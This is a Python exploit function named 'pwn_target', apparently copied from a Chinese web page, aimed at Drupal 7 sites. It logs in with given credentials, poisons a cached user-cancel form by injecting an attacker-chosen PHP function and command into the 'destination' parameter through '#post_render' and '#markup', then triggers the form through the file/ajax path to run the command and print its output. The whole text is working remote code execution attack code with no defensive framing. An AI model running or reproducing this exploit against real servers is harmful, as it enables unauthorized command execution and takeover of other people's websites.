- def pwn_target(target, username, password, function, command, proxy):
- requests.packages.urllib3.disable_warnings()
- session = requests.Session()
- proxyConf = {
- 'http': proxy, 'https': proxy
- }
- try:
- print('[] Creating a session using the provided credential...')
- get_params = {
- 'q':'user/login'
- }
- post_params = {
- 'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'
- }
- print('[] Finding User ID...')
- session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
- get_params = {
- 'q':'user'
- }
- r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
- soup = BeautifulSoup(r.text, "html.parser")
- user_id = soup.find('meta', {
- 'property': 'foaf:name'
- }).get('about')
- if ("?q=" in user_id):
- user_id = user_id.split("=")[1]
- if(user_id):
- print('[] User ID found:' + user_id)
- print('[] Poisoning a form using \'destination\'and including it in cache.')
- get_params = {
- 'q': user_id + '/cancel'
- }
- r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
- soup = BeautifulSoup(r.text, "html.parser")
- form = soup.find('form', {
- 'id': 'user-cancel-confirm-form'
- })
- form_token = form.find('input', {
- 'name': 'form_token'
- }).get('value')
- get_params = {
- 'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[#post_render][]=' + function + '&q[#type]=markup&q[#markup]=' + command
- }
- post_params = {
- 'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'
- }
- r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
- soup = BeautifulSoup(r.text, "html.parser")
- form = soup.find('form', {
- 'id': 'user-cancel-confirm-form'
- })
- form_build_id = form.find('input', {
- 'name': 'form_build_id'
- }).get('value')
- if form_build_id:
- print('[] Poisoned form ID:' + form_build_id)
- print('[] Triggering exploit to execute:' + command)
- get_params = {
- 'q':'file/ajax/actions/cancel/#options/path/' + form_build_id
- }
- post_params = {
- 'form_build_id':form_build_id
- }
- r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
- parsed_result = r.text.split('[{"command":"settings"')[0]
- print(parsed_result)
- except:
- print("ERROR: Something went wrong.")
- raise
来源: http://www.bubuko.com/infodetail-3128650.html